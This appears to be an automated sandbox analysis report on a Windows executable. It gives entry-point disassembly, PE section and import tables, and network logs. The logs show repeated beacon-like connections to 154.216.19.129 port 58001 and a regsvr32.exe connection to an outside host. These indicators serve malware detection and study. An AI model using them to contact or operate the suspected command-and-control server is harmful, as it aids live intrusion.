                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:483f0c4259a9148c34961abbda6146c1
                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  add esp, FFFFFFA4h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  xor eax, eax
                                                                  mov dword ptr [ebp-3Ch], eax
                                                                  mov dword ptr [ebp-40h], eax
                                                                  mov dword ptr [ebp-5Ch], eax
                                                                  mov dword ptr [ebp-30h], eax
                                                                  mov dword ptr [ebp-38h], eax
                                                                  mov dword ptr [ebp-34h], eax
                                                                  mov dword ptr [ebp-2Ch], eax
                                                                  mov dword ptr [ebp-28h], eax
                                                                  mov dword ptr [ebp-14h], eax
                                                                  mov eax, 004152B8h
                                                                  call 00007F1AC0B356A1h
                                                                  xor eax, eax
                                                                  push ebp
                                                                  push 00416B45h
                                                                  push dword ptr fs:[eax]
                                                                  mov dword ptr fs:[eax], esp
                                                                  xor edx, edx
                                                                  push ebp
                                                                  push 00416B01h
                                                                  push dword ptr fs:[edx]
                                                                  mov dword ptr fs:[edx], esp
                                                                  mov eax, dword ptr [0041AB48h]
                                                                  call 00007F1AC0B43F4Bh
                                                                  call 00007F1AC0B43AF2h
                                                                  lea edx, dword ptr [ebp-14h]
                                                                  xor eax, eax
                                                                  call 00007F1AC0B3D774h
                                                                  mov edx, dword ptr [ebp-14h]
                                                                  mov eax, 0041D6E8h
                                                                  call 00007F1AC0B33CD7h
                                                                  push 00000002h
                                                                  push 00000000h
                                                                  push 00000001h
                                                                  mov ecx, dword ptr [0041D6E8h]
                                                                  mov dl, 01h
                                                                  mov eax, dword ptr [0040F080h]
                                                                  call 00007F1AC0B3E05Fh
                                                                  mov dword ptr [0041D6ECh], eax
                                                                  xor edx, edx
                                                                  push ebp
                                                                  push 00416AADh
                                                                  push dword ptr fs:[edx]
                                                                  mov dword ptr fs:[edx], esp
                                                                  call 00007F1AC0B43FD3h
                                                                  mov dword ptr [0041D6F4h], eax
                                                                  mov eax, dword ptr [0041D6F4h]
                                                                  cmp dword ptr [eax+0Ch], 01h
                                                                  jne 00007F1AC0B4533Ah
                                                                  mov eax, dword ptr [0041D6F4h]
                                                                  mov edx, 00000028h
                                                                  call 00007F1AC0B3E528h
                                                                  mov edx, dword ptr [0041D6F4h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1e000 | 0xf9e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x21000 | 0xb1d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x20000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1e350 | 0x24c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x143f8 | 0x14400 | c9bb3afc1ceaaa31127ccfa204c657ef | False | 0.5487316743827161 | data | 6.482216817915366 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x16000 | 0xbe8 | 0xc00 | 1ba5adf2e1058c0460dcc814ba86fb32 | False | 0.6246744791666666 | data | 6.005798728198158 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0xd9c | 0xe00 | d5b22eff9e08edaa95f493c1a71158c0 | False | 0.2924107142857143 | data | 2.669288666959085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x18000 | 0x574c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x1e000 | 0xf9e | 0x1000 | b47eaca4c149ee829de76a342b5560d5 | False | 0.35595703125 | data | 4.9677831942996935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x1f000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x20000 | 0x18 | 0x200 | 3746f5876803f8f30db5bb2deb8772ae | False | 0.05078125 | data | 0.190488766434666 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x21000 | 0xb1d8 | 0xb200 | 32a01e8a94203e16091013ee86f52f2e | False | 0.17913886938202248 | data | 4.153057267294984 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x2141c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
RT_ICON | 0x21544 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
RT_ICON | 0x21aac | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
RT_ICON | 0x21d94 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
RT_STRING | 0x2263c | 0xc4 | data | | | 0.5969387755102041
RT_STRING | 0x22700 | 0xcc | data | | | 0.6225490196078431
RT_STRING | 0x227cc | 0x174 | data | | | 0.5510752688172043
RT_STRING | 0x22940 | 0x39c | data | | | 0.34523809523809523
RT_STRING | 0x22cdc | 0x34c | data | | | 0.4218009478672986
RT_STRING | 0x23028 | 0x294 | data | | | 0.4106060606060606
RT_RCDATA | 0x232bc | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x2b5a4 | 0x10 | data | | | 1.5
RT_RCDATA | 0x2b5b4 | 0x1a0 | data | | | 0.8149038461538461
RT_RCDATA | 0x2b754 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x2b780 | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x2b7c0 | 0x4b8 | COM executable for DOS | English | United States | 0.2806291390728477
RT_MANIFEST | 0x2bc78 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll | WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Nov 21, 2024 02:59:05.075320959 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:05.194942951 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:05.195116997 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:05.314527035 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.385727882 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.385802031 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.385982037 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.501842976 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.505431890 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.621381998 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.623919964 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.625190973 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.744824886 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.744901896 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.864439964 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.024154902 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.024216890 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.024363041 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.127183914 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.143799067 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.249114037 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.249223948 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.250066042 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.369503975 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.369565964 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:08.489022017 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:09.654086113 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:09.654160023 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:09.654309034 CET4977258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:09.767433882 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:09.773756981 CET5800149772154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:09.886934996 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:09.887029886 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:09.887978077 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:10.007566929 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:10.007637978 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:10.127247095 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.244595051 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.244746923 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.244798899 CET4977858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.361028910 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.364229918 CET5800149778154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.480468988 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.480571985 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.481573105 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.600948095 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:11.601413012 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:11.720808983 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:12.792947054 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:12.793349981 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:12.795001984 CET4977958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:12.914378881 CET5800149779154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:12.954863071 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:13.074323893 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:13.074399948 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:13.075120926 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:13.194601059 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:13.194797993 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:13.314250946 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.432169914 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.432225943 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.432368994 CET4978558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.548695087 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.551748037 CET5800149785154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.668467999 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.668555021 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.669224024 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.788645029 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:14.788698912 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:14.908273935 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.029027939 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.029078960 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.029259920 CET4979158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.142337084 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.148695946 CET5800149791154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.261812925 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.261909008 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.263026953 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.382477045 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:16.382541895 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:16.501977921 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:17.665210009 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:17.665420055 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:17.669367075 CET4979358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:17.767379045 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:17.788872004 CET5800149793154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:17.887001038 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:17.887501955 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:17.887890100 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:18.007376909 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:18.007541895 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:18.127453089 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.244167089 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.244263887 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.244415998 CET4979858001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.361417055 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.363852978 CET5800149798154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.481107950 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.481208086 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.482122898 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.601551056 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:19.601625919 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:19.721122026 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:20.889522076 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:20.889653921 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:20.889786005 CET4980458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.001813889 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.009186029 CET5800149804154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:21.121326923 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:21.121424913 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.122379065 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.241770029 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:21.241827965 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:21.361252069 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.439981937 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.440067053 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.440200090 CET4980958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.548650026 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.559592009 CET5800149809154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.668086052 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.668252945 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.669125080 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.788516998 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:22.788578033 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:22.907977104 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:23.979026079 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:23.979101896 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:23.979355097 CET4981158001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.095561028 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.098835945 CET5800149811154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:24.215121984 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:24.215255976 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.215960979 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.335370064 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:24.335436106 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:24.454961061 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:25.745150089 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:25.745300055 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:25.745345116 CET4981758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:25.861375093 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:25.864826918 CET5800149817154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:25.980906010 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:25.981035948 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:25.981766939 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:26.101229906 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:26.101309061 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:26.220792055 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.338984966 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.339082956 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.339242935 CET4982358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.455010891 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.460058928 CET5800149823154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.574489117 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.574620008 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.575249910 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.694674969 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:27.694753885 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:27.814186096 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:28.978099108 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:28.980168104 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:28.980413914 CET4982658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.095599890 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.099834919 CET5800149826154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:29.215006113 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:29.215127945 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.215878010 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.335304022 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:29.335438967 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:29.454860926 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.619853973 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.619946957 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.620104074 CET4983058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.736309052 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.739492893 CET5800149830154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.855806112 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.856085062 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.856590033 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:30.976015091 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:30.976108074 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:31.095613003 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.212747097 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.212858915 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.213051081 CET4983658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.329895020 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.332504988 CET5800149836154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.449389935 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.449520111 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.450386047 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.569818020 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:32.569936037 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:32.689908028 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:33.849682093 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:33.849746943 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:33.849968910 CET4984258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:33.955388069 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:34.089601994 CET5800149842154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:34.089857101 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:34.089955091 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:34.090742111 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:34.210630894 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:34.210763931 CET4984358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:34.330172062 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:35.494399071 CET5800149843154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:35.494498968 CET4984358001192.168.2.4154.216.19.129
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 02:58:55.280458927 CET | 64351 | 53 | 192.168.2.4 | 1.1.1.1
Nov 21, 2024 02:58:55.649744987 CET | 53 | 64351 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 02:58:55.280458927 CET | 192.168.2.4 | 1.1.1.1 | 0x8eb5 | Standard query (0) | the.earth.li | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 02:58:55.649744987 CET | 1.1.1.1 | 192.168.2.4 | 0x8eb5 | No error (0) | the.earth.li | | 93.93.131.124 | A (IP address) | IN (0x0001) | false
                                                                  • the.earth.li
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 93.93.131.124 | 443 | 7688 | C:\Windows\System32\regsvr32.exe
